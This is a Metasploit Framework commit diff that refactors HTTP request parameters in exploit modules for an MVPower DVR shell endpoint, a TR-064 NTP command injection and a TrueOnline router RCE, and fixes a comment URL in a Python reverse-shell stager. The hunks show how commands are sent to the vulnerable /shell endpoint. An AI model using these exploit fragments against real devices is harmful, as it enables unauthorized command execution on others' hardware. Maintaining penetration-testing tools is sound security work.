Land rapid7#8070, msftidy vars_get fixes

Author: wvu

modules/exploits/linux/http/mvpower_dvr_shell_exec.rb

@@ -60,7 +60,9 @@ def check
     begin
       fingerprint = Rex::Text::rand_text_alpha(rand(10) + 6)
       res = send_request_cgi(
-        'uri' => "/shell?echo+#{fingerprint}",
+        'method' => 'GET',
+        'uri' => '/shell',
+        'query' => "echo+#{fingerprint}",
         'headers' => { 'Connection' => 'Keep-Alive' }
       )
       if res && res.body.include?(fingerprint)
@@ -75,7 +77,8 @@ def check
   def execute_command(cmd, opts)
     begin
       send_request_cgi(
-        'uri' => "/shell?#{Rex::Text.uri_encode(cmd, 'hex-all')}",
+        'uri' => '/shell',
+        'query' => Rex::Text.uri_encode(cmd, 'hex-all'),
         'headers' => { 'Connection' => 'Keep-Alive' }
       )
     rescue ::Rex::ConnectionError

modules/exploits/linux/http/tr064_ntpserver_cmdinject.rb

@@ -104,7 +104,8 @@ def execute_command(cmd, opts)
   def check
     begin
       res = send_request_cgi({
-        'uri' => '/globe' # TODO: Check this? Why not /UD/act?1
+        'method' => 'GET',
+        'uri' => '/globe'
       })
     rescue ::Rex::ConnectionError
       vprint_error("#{peer} - A connection error has occured")

modules/exploits/linux/http/trueonline_p660hn_v2_rce.rb

@@ -98,7 +98,8 @@ def exploit
     @cookie = rand_text_alpha_lower(7)
 
     res = send_request_cgi({
-      'uri'     => '/cgi-bin/index.asp?' + Rex::Text.encode_base64("#{datastore['USERNAME']}:#{datastore['PASSWORD']}"),
+      'uri'     => '/cgi-bin/index.asp',
+      'query'   =>  Rex::Text.encode_base64("#{datastore['USERNAME']}:#{datastore['PASSWORD']}"),
       'method'  => 'POST',
       'cookie'  => "SESSIONID=#{@cookie}",
       'vars_post' => {

modules/payloads/stagers/python/reverse_tcp_ssl.rb

@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http//metasploit.com/download
+# This module requires Metasploit: https://www.metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##